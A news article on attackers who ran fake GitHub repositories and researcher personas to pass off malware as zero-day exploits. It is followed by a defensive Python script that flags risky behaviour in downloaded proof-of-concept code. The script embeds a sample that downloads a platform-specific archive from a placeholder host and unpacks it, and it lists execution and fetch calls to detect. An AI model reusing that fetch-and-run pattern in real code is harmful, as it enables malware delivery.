Attackers set up rogue GitHub repos with malware posing as zero-day exploits
Attackers have been carrying out a unique cyberattack by creating fake GitHub repositories that pretend to offer zero-day exploits for popular applications. However, instead of providing legitimate exploits, these repositories deliver malware. The attackers went to great lengths to create fake personas, including fake GitHub and Twitter accounts posing as security researchers. They even used real photos of researchers from reputable cybersecurity firms, just as they did while distributing fake ChatGPT apps online.
While attacks targeting security researchers are not unheard of, they are relatively rare and often conducted by advanced persistent threat (APT) groups. These groups aim to gain access to sensitive information that researchers possess. In a similar attack reported by Google Threat Analysis Group in 2021, a government-backed North Korean entity created a network of fake accounts on social media platforms, pretending to be security researchers. They used these accounts to promote proof-of-concept exploits and distributed malware to victims.
VulnCheck, a security firm, discovered the first rogue repository in early May and promptly reported it to GitHub, which took it down. The repository claimed to offer a zero-day remote code execution exploit for Signal, a popular secure communications app. Subsequently, the attacker continued creating new accounts and repositories, claiming to offer exploits for applications like Microsoft Exchange, Google Chrome, Discord, and Chromium. These repositories were promoted through Twitter accounts associated with the fake personas.
While the 2021 attack involved more sophistication than the recent campaign, it's unclear if they are the work of the same attackers. The malicious code, distributed as a file called poc.py from the rogue GitHub repositories, downloads additional files named cveslinux.zip and cveswindows.zip, depending on the operating system. These files contain malware that is flagged by multiple antivirus programs.
Researchers emphasise that security researchers are valuable targets for malicious actors and should exercise caution when downloading code from GitHub. It is crucial to review the code before execution and to refrain from running anything that is not understood. Experienced researchers typically take precautions by running potentially malicious code on an isolated system inside a closely monitored virtual machine that is deleted afterwards. Executing such code on a work machine, or without a VPN, would likely violate standard security policies, especially within a cybersecurity company.
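As an added example (not code from the article or from VulnCheck), the following script is a small static pre-execution triage aid for the "review before you run" advice above: it parses a downloaded PoC with Python's `ast` module and flags the behaviours described in the campaign, an OS check, a remote fetch, an archive filename and process or code execution. The embedded `SAMPLE_POC` is a constructed stand-in matching the described shape of poc.py, with a placeholder URL; it is not the real payload.

```python
import ast
import sys

# Constructed stand-in for a downloaded "poc.py" (not the real payload): it only
# mirrors the shape the article describes, an OS check followed by a fetch of a
# platform-specific archive, and uses a placeholder URL that resolves nowhere.
SAMPLE_POC = '''
import platform, subprocess, urllib.request
name = "cveslinux.zip" if platform.system() == "Linux" else "cveswindows.zip"
urllib.request.urlretrieve("https://placeholder.invalid/" + name, name)
subprocess.run(["unzip", name])
'''

FETCH = {"urlopen", "urlretrieve", "get", "post"}
EXEC = {"system", "popen", "run", "call", "Popen", "check_output", "startfile"}

def _root(expr):
    # Walk an attribute chain like urllib.request.urlretrieve down to "urllib".
    while isinstance(expr, ast.Attribute):
        expr = expr.value
    return getattr(expr, "id", "")

def triage_poc(source):
    """Static pre-execution review of a PoC: returns sorted finding labels."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            f = node.func
            root, name = _root(f), (f.attr if isinstance(f, ast.Attribute) else _root(f))
            if root in {"urllib", "requests"} and name in FETCH:
                findings.add("remote-fetch")
            if name in {"exec", "eval"} or (root in {"os", "subprocess"} and name in EXEC):
                findings.add("process-or-code-execution")
            if root == "platform" or (root == "os" and name == "uname"):
                findings.add("os-dependent-branch")
        elif isinstance(node, ast.Attribute):
            if (_root(node.value), node.attr) in {("sys", "platform"), ("os", "name")}:
                findings.add("os-dependent-branch")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            v = node.value.lower()
            if v.startswith(("http://", "https://")):
                findings.add("hardcoded-url")
            if v.endswith((".zip", ".exe", ".dll", ".so")):
                findings.add("archive-or-binary-name")
    return sorted(findings)

if __name__ == "__main__":
    # Pass a file path to review, or run without arguments to review SAMPLE_POC.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_POC
    for flag in triage_poc(src):
        print("flag:", flag)
```

A flagged file is not proof of malice, but any PoC that fetches and runs a platform-specific archive deserves reading in full and execution only inside a disposable virtual machine.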